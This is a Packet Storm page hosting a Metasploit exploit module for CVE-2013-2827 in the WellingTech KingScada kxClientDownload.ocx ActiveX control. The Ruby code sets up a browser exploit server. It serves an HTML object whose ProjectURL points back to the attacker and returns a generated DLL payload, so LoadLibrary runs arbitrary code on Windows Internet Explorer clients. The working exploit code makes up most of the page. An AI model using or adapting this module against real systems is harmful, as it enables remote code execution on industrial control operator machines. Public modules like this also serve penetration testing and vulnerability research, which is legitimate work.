what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

KingScada kxClientDownload.ocx ActiveX Remote Code Execution

KingScada kxClientDownload.ocx ActiveX Remote Code Execution
Posted Feb 11, 2014
Authored by Andrea Micalizzi, juan vazquez | Site metasploit.com

This Metasploit module abuses the kxClientDownload.ocx ActiveX control distributed with WellingTech KingScada. The ProjectURL property can be abused to download and load arbitrary DLLs from arbitrary locations, leading to arbitrary code execution, because of a dangerous usage of LoadLibrary. Due to the nature of the vulnerability, this module will work only when Protected Mode is not present or not enabled.

tags | exploit, arbitrary, code execution, activex
advisories | CVE-2013-2827
SHA-256 | ad47b03cb77be889b47d699cea4b847b22b73010c94c1218576856423018df63

KingScada kxClientDownload.ocx ActiveX Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::EXE

def initialize(info = {})
super(update_info(info,
'Name' => 'KingScada kxClientDownload.ocx ActiveX Remote Code Execution',
'Description' => %q{
This module abuses the kxClientDownload.ocx ActiveX control distributed with WellingTech KingScada.
The ProjectURL property can be abused to download and load arbitrary DLLs from
arbitrary locations, leading to arbitrary code execution, because of a dangerous
usage of LoadLibrary. Due to the nature of the vulnerability, this module will work
only when Protected Mode is not present or not enabled.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Andrea Micalizzi', # aka rgod original discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2013-2827'],
['OSVDB', '102135'],
['BID', '64941'],
['ZDI', '14-011'],
['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-13-344-01']
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
},
'BrowserRequirements' =>
{
:source => /script|headers/i,
:os_name => Msf::OperatingSystems::WINDOWS,
:ua_name => /MSIE|KXCLIE/i
},
'Payload' =>
{
'Space' => 2048,
'StackAdjustment' => -3500,
'DisableNopes' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 14 2014'))
end

def on_request_exploit(cli, request, target_info)
print_status("Requested: #{request.uri}")

if request.uri =~ /\/libs\/.*\.dll/
print_good("Sending DLL payload")
send_response(cli,
generate_payload_dll(:code => get_payload(cli, target_info)),
'Content-Type' => 'application/octet-stream'
)
return
elsif request.uri =~ /\/libs\//
print_status("Sending not found")
send_not_found(cli)
return
end

content = <<-EOS
<html>
<body>
<object classid='clsid:1A90B808-6EEF-40FF-A94C-D7C43C847A9F' id='#{rand_text_alpha(10 + rand(10))}'>
<param name="ProjectURL" value="#{get_module_uri}"></param>
</object>
</body>
</html>
EOS

print_status("Sending #{self.name}")
send_response_html(cli, content)
end

end
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    25 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close